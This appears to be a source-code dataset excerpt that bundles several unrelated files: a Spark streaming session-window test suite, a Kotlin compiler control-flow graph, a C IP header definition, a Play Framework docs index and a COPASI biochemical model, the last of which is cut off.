org.apache.spark.unsafe.types.UTF8String class MergingSortWithSessionWindowStateIteratorSuite extends StreamTest with BeforeAndAfter { private val rowSchema = new StructType().add("key1", StringType).add("key2", IntegerType) .add("session", new StructType().add("start", LongType).add("end", LongType)) .add("value", LongType) private val rowAttributes = rowSchema.toAttributes private val keysWithoutSessionAttributes = rowAttributes.filter { attr => List("key1", "key2").contains(attr.name) } private val sessionAttribute = rowAttributes.filter(_.name == "session").head private val inputValueGen = UnsafeProjection.create(rowAttributes.map(_.dataType).toArray) private val inputKeyGen = UnsafeProjection.create( keysWithoutSessionAttributes.map(_.dataType).toArray) before { SparkSession.setActiveSession(spark) spark.streams.stateStoreCoordinator // initialize the lazy coordinator } private val providerOptions = Seq( classOf[HDFSBackedStateStoreProvider].getCanonicalName, classOf[RocksDBStateStoreProvider].getCanonicalName).map { value => (SQLConf.STATE_STORE_PROVIDER_CLASS.key, value.stripSuffix("$")) } private val availableOptions = for ( opt1 <- providerOptions; opt2 <- StreamingSessionWindowStateManager.supportedVersions ) yield (opt1, opt2) availableOptions.foreach { case (providerOpt, version) => withSQLConf(providerOpt) { test(s"StreamingSessionWindowStateManager " + s"provider ${providerOpt._2} state version v${version} - rows only in state") { testRowsOnlyInState(version) } test(s"StreamingSessionWindowStateManager " + s"provider ${providerOpt._2} state version v${version} - rows in both input and state") { testRowsInBothInputAndState(version) } test(s"StreamingSessionWindowStateManager " + s"provider ${providerOpt._2} state version v${version} - rows only in input") { testRowsOnlyInInput(version) } } } private def testRowsOnlyInState(stateFormatVersion: Int): Unit = { withStateManager(stateFormatVersion) { case (stateManager, store) => val key = createKeyRow("a", 1) val values = Seq( createRow("a", 1, 100, 110, 1), createRow("a", 1, 120, 130, 2), createRow("a", 1, 140, 150, 3)) stateManager.updateSessions(store, key, values) val iter = new MergingSortWithSessionWindowStateIterator( Iterator.empty, stateManager, store, keysWithoutSessionAttributes, sessionAttribute, rowAttributes) val actual = iter.map(_.copy()).toList assert(actual.isEmpty) } } private def testRowsInBothInputAndState(stateFormatVersion: Int): Unit = { withStateManager(stateFormatVersion) { case (stateManager, store) => val key1 = createKeyRow("a", 1) val key1Values = Seq( createRow("a", 1, 100, 110, 1), createRow("a", 1, 120, 130, 2), createRow("a", 1, 140, 150, 3)) // This is to ensure sessions will not be populated if the input doesn't have such group key val key2 = createKeyRow("a", 2) val key2Values = Seq( createRow("a", 2, 100, 110, 1), createRow("a", 2, 120, 130, 2), createRow("a", 2, 140, 150, 3)) val key3 = createKeyRow("b", 1) val key3Values = Seq( createRow("b", 1, 100, 110, 1), createRow("b", 1, 120, 130, 2), createRow("b", 1, 140, 150, 3)) stateManager.updateSessions(store, key1, key1Values) stateManager.updateSessions(store, key2, key2Values) stateManager.updateSessions(store, key3, key3Values) val inputsForKey1 = Seq( createRow("a", 1, 90, 100, 1), createRow("a", 1, 125, 135, 2)) val inputsForKey3 = Seq( createRow("b", 1, 150, 160, 3) ) val inputs = inputsForKey1 ++ inputsForKey3 val iter = new MergingSortWithSessionWindowStateIterator( inputs.iterator, stateManager, store, keysWithoutSessionAttributes, sessionAttribute, rowAttributes) val actual = iter.map(_.copy()).toList val expected = (key1Values ++ inputsForKey1).sortBy(getSessionStart) ++ (key3Values ++ inputsForKey3).sortBy(getSessionStart) assert(actual === expected.toList) } } private def testRowsOnlyInInput(stateFormatVersion: Int): Unit = { withStateManager(stateFormatVersion) { case (stateManager, store) => // This is to ensure sessions will not be populated if the input doesn't have such group key val key1 = createKeyRow("a", 1) val key1Values = Seq( createRow("a", 1, 100, 110, 1), createRow("a", 1, 120, 130, 2), createRow("a", 1, 140, 150, 3)) stateManager.updateSessions(store, key1, key1Values) val inputs = Seq( createRow("b", 1, 100, 110, 1), createRow("b", 1, 120, 130, 2), createRow("b", 1, 140, 150, 3)) val iter = new MergingSortWithSessionWindowStateIterator( inputs.iterator, stateManager, store, keysWithoutSessionAttributes, sessionAttribute, rowAttributes) val actual = iter.map(_.copy()).toList assert(actual === inputs.toList) } } private def createRow( key1: String, key2: Int, sessionStart: Long, sessionEnd: Long, value: Long): UnsafeRow = { val sessionRow = new GenericInternalRow(Array[Any](sessionStart, sessionEnd)) val row = new GenericInternalRow( Array[Any](UTF8String.fromString(key1), key2, sessionRow, value)) inputValueGen.apply(row).copy() } private def createKeyRow(key1: String, key2: Int): UnsafeRow = { val row = new GenericInternalRow(Array[Any](UTF8String.fromString(key1), key2)) inputKeyGen.apply(row).copy() } private def getSessionStart(row: UnsafeRow): Long = { row.getStruct(2, 2).getLong(0) } private def withStateManager( stateFormatVersion: Int)( f: (StreamingSessionWindowStateManager, StateStore) => Unit): Unit = { withTempDir { file => val storeConf = new StateStoreConf() val stateInfo = StatefulOperatorStateInfo(file.getAbsolutePath, UUID.randomUUID, 0, 0, 5) val manager = StreamingSessionWindowStateManager.createStateManager( keysWithoutSessionAttributes, sessionAttribute, rowAttributes, stateFormatVersion) val storeProviderId = StateStoreProviderId(stateInfo, 0, StateStoreId.DEFAULT_STORE_NAME) val store = StateStore.get( storeProviderId, manager.getStateKeySchema, manager.getStateValueSchema, manager.getNumColsForPrefixKey, stateInfo.storeVersion, storeConf, new Configuration) try { f(manager, store) } finally { manager.abortIfNeeded(store) } } } }
Scala
3
akhalymon-cv/spark
sql/core/src/test/scala/org/apache/spark/sql/execution/streaming/MergingSortWithSessionWindowStateIteratorSuite.scala
[ "Apache-2.0" ]
digraph classCallInLambda_kt { graph [nodesep=3] node [shape=box penwidth=2] edge [penwidth=2] subgraph cluster_0 { color=red 0 [label="Enter function test" style="filled" fillcolor=red]; subgraph cluster_1 { color=blue 1 [label="Enter block"]; 2 [label="Access variable R|<local>/x|"]; 3 [label="Postponed enter to lambda"]; subgraph cluster_2 { color=blue 11 [label="Enter function anonymousFunction" style="filled" fillcolor=red]; subgraph cluster_3 { color=blue 12 [label="Enter block"]; 13 [label="Access variable R|<local>/it|"]; 14 [label="::class call"]; 15 [label="Exit block"]; } 16 [label="Exit function anonymousFunction" style="filled" fillcolor=red]; } 4 [label="Call arguments union" style="filled" fillcolor=yellow]; 5 [label="Postponed exit from lambda"]; 6 [label="Function call: R|<local>/x|.R|kotlin/let|<R|kotlin/String|, R|kotlin/reflect/KClass<out kotlin/String>|>(...)"]; 7 [label="Jump: ^test R|<local>/x|.R|kotlin/let|<R|kotlin/String|, R|kotlin/reflect/KClass<out kotlin/String>|>(<L> = let@fun <anonymous>(it: R|kotlin/String|): R|kotlin/reflect/KClass<out kotlin/String>| <inline=Inline, kind=EXACTLY_ONCE> { ^ <getClass>(R|<local>/it|) } )"]; 8 [label="Stub" style="filled" fillcolor=gray]; 9 [label="Exit block" style="filled" fillcolor=gray]; } 10 [label="Exit function test" style="filled" fillcolor=red]; } 0 -> {1}; 1 -> {2}; 2 -> {3}; 3 -> {11}; 3 -> {5} [color=red]; 3 -> {11} [style=dashed]; 4 -> {6} [color=red]; 5 -> {6} [color=green]; 6 -> {7}; 7 -> {10}; 7 -> {8} [style=dotted]; 8 -> {9} [style=dotted]; 9 -> {10} [style=dotted]; 11 -> {12}; 12 -> {13}; 13 -> {14}; 14 -> {15}; 15 -> {16}; 16 -> {4} [color=red]; 16 -> {5} [color=green]; }
Graphviz (DOT)
4
Mu-L/kotlin
compiler/fir/analysis-tests/testData/resolve/classCallInLambda.dot
[ "ECL-2.0", "Apache-2.0" ]
/* * Copyright (c) 2018-2020, Andreas Kling <kling@serenityos.org> * * SPDX-License-Identifier: BSD-2-Clause */ #pragma once #include <assert.h> #include <bits/stdint.h> #include <sys/cdefs.h> #include "in.h" __BEGIN_DECLS struct ip { #if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ uint8_t ip_v : 4; uint8_t ip_hl : 4; #elif __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__ uint8_t ip_hl : 4; uint8_t ip_v : 4; #endif uint8_t ip_tos; uint16_t ip_len; uint16_t ip_id; uint16_t ip_off; uint8_t ip_ttl; uint8_t ip_p; uint16_t ip_sum; struct in_addr ip_src; struct in_addr ip_dst; } __attribute__((packed)); static_assert(sizeof(struct ip) == 20, "struct ip: invalid length"); __END_DECLS
C
3
r00ster91/serenity
Userland/Libraries/LibC/netinet/ip.h
[ "BSD-2-Clause" ]
Production:Using Play in production Deploying:Deploying your application ProductionConfiguration:Production configuration HTTPServer:Setting up a front end HTTP server ConfiguringHttps:Configuring HTTPS !cloud:Deploying to a cloud service
TeX
3
eed3si9n/playframework
documentation/manual/working/commonGuide/production/index.toc
[ "Apache-2.0" ]
<?xml version="1.0" encoding="UTF-8"?> <!-- generated with COPASI 4.30 (Build 236) (http://www.copasi.org) at 2020-12-28T19:18:44Z --> <?oxygen RNGSchema="http://www.copasi.org/static/schema/CopasiML.rng" type="xml"?> <COPASI xmlns="http://www.copasi.org/static/schema" versionMajor="4" versionMinor="30" versionDevel="236" copasiSourcesModified="0"> <ListOfFunctions> <Function key="Function_13" name="Mass action (irreversible)" type="MassAction" reversible="false"> <MiriamAnnotation> <rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Function_13"> <CopasiMT:is rdf:resource="urn:miriam:obo.sbo:SBO:0000041" /> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Comment> <body xmlns="http://www.w3.org/1999/xhtml"> <b>Mass action rate law for first order irreversible reactions</b> <p> Reaction scheme where the products are created from the reactants and the change of a product quantity is proportional to the product of reactant activities. The reaction scheme does not include any reverse process that creates the reactants from the products. The change of a product quantity is proportional to the quantity of one reactant. </p> </body> </Comment> <Expression> k1*PRODUCT&lt;substrate_i> </Expression> <ListOfParameterDescriptions> <ParameterDescription key="FunctionParameter_80" name="k1" order="0" role="constant"/> <ParameterDescription key="FunctionParameter_81" name="substrate" order="1" role="substrate"/> </ListOfParameterDescriptions> </Function> </ListOfFunctions> <Model key="Model_1" name="multistate" simulationType="time" timeUnit="s" volumeUnit="l" areaUnit="m²" lengthUnit="m" quantityUnit="#" type="stochastic" avogadroConstant="6.0221408570000002e+23"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Model_1"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2017-11-18T21:23:39Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfCompartments> <Compartment key="Compartment_67" name="cell" simulationType="fixed" dimensionality="3" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Compartment_67"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Compartment> </ListOfCompartments> <ListOfMetabolites> <Metabolite key="Metabolite_1577" name="R(a,l)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_1577"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> <Metabolite key="Metabolite_1578" name="L(r)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_1578"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> <Metabolite key="Metabolite_1586" name="A(Y~U,r)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_1586"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> <Metabolite key="Metabolite_398" name="L(r!1).R(a,l!1)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_398"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> <Metabolite key="Metabolite_397" name="A(Y~U,r!1).R(a!1,l)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_397"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> <Metabolite key="Metabolite_396" name="A(Y~U,r!1).L(r!2).R(a!1,l!2)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_396"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> <Metabolite key="Metabolite_395" name="A(Y~P,r!1).L(r!2).R(a!1,l!2)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_395"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> <Metabolite key="Metabolite_394" name="A(Y~P,r!1).R(a!1,l)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_394"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> <Metabolite key="Metabolite_393" name="A(Y~P,r)" simulationType="reactions" compartment="Compartment_67" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Metabolite_393"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </Metabolite> </ListOfMetabolites> <ListOfModelValues> <ModelValue key="ModelValue_4" name="R0" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_4"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_3" name="L0" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_3"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_2" name="A0" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_2"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_1" name="kon" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_1"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_0" name="koff" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_0"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_8" name="kAon" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_8"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_9" name="kAoff" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_9"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_10" name="kAp" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_10"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_11" name="kAdp" simulationType="fixed" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_11"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> </ModelValue> <ModelValue key="ModelValue_12" name="Group_A_P" simulationType="assignment" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_12"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Expression> &lt;CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r!1).L(r!2).R(a!1\,l!2)],Reference=Concentration>+&lt;CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r!1).R(a!1\,l)],Reference=Concentration>+&lt;CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r)],Reference=Concentration> </Expression> </ModelValue> <ModelValue key="ModelValue_13" name="Group_A_unbound_P" simulationType="assignment" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_13"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Expression> 0+&lt;CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r)],Reference=Concentration> </Expression> </ModelValue> <ModelValue key="ModelValue_14" name="Group_A_bound_P" simulationType="assignment" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_14"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Expression> &lt;CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r!1).L(r!2).R(a!1\,l!2)],Reference=Concentration>+&lt;CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r!1).R(a!1\,l)],Reference=Concentration> </Expression> </ModelValue> <ModelValue key="ModelValue_15" name="Group_RLA_P" simulationType="assignment" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#ModelValue_15"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <Expression> 0+&lt;CN=Root,Model=multistate,Vector=Compartments[cell],Vector=Metabolites[A(Y~P\,r!1).L(r!2).R(a!1\,l!2)],Reference=Concentration> </Expression> </ModelValue> </ListOfModelValues> <ListOfReactions> <Reaction key="Reaction_3178" name="R1" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_3178"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_1577" stoichiometry="1"/> <Substrate metabolite="Metabolite_1578" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_398" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7075" name="k1" value="0.01"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_1"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_1577"/> <SourceParameter reference="Metabolite_1578"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_3179" name="R2" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_3179"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_1577" stoichiometry="1"/> <Substrate metabolite="Metabolite_1586" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_397" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7082" name="k1" value="0.01"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_8"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_1577"/> <SourceParameter reference="Metabolite_1586"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_3180" name="R3" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_3180"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_1578" stoichiometry="1"/> <Substrate metabolite="Metabolite_397" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_396" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7079" name="k1" value="0.01"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_1"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_1578"/> <SourceParameter reference="Metabolite_397"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_3181" name="R4" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_3181"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_398" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_1577" stoichiometry="1"/> <Product metabolite="Metabolite_1578" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_7080" name="k1" value="0.1"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_0"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_398"/> </CallParameter> </ListOfCallParameters> </KineticLaw> </Reaction> <Reaction key="Reaction_476" name="R5" reversible="false" fast="false" addNoise="false"> <MiriamAnnotation> <rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="#Reaction_476"> <dcterms:created> <rdf:Description> <dcterms:W3CDTF>2020-12-28T18:53:00Z</dcterms:W3CDTF> </rdf:Description> </dcterms:created> </rdf:Description> </rdf:RDF> </MiriamAnnotation> <ListOfSubstrates> <Substrate metabolite="Metabolite_1586" stoichiometry="1"/> <Substrate metabolite="Metabolite_398" stoichiometry="1"/> </ListOfSubstrates> <ListOfProducts> <Product metabolite="Metabolite_396" stoichiometry="1"/> </ListOfProducts> <ListOfConstants> <Constant key="Parameter_10112" name="k1" value="0.01"/> </ListOfConstants> <KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=multistate,Vector=Compartments[cell]"> <ListOfCallParameters> <CallParameter functionParameter="FunctionParameter_80"> <SourceParameter reference="ModelValue_8"/> </CallParameter> <CallParameter functionParameter="FunctionParameter_81"> <SourceParameter reference="Metabolite_1586"/> 